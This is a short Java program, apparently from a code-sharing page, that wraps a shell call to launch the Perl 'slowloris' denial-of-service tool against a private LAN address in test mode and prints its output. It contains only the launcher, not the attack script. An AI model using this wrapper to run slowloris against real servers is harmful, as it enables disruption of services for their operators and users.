1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
| import java.lang.Runtime;
import java.lang.Process;
import java.io.*;
import java.lang.InterruptedException;
public class slowloris {
public static void main (String args[]) throws IOException, InterruptedException {
String[]cmd=new String[]{"/bin/sh","-c","cd Desktop/;perl slowloris.pl -dns 192.168.1.3 -test"};
Runtime rt = Runtime.getRuntime();
Process pr = rt.exec(cmd);
BufferedReader bfr = new BufferedReader(new InputStreamReader(pr.getInputStream()));
String line = "";
while((line = bfr.readLine()) != null)
{
// display each output line form perl script
System.out.println(line);
}
}
} |
Partager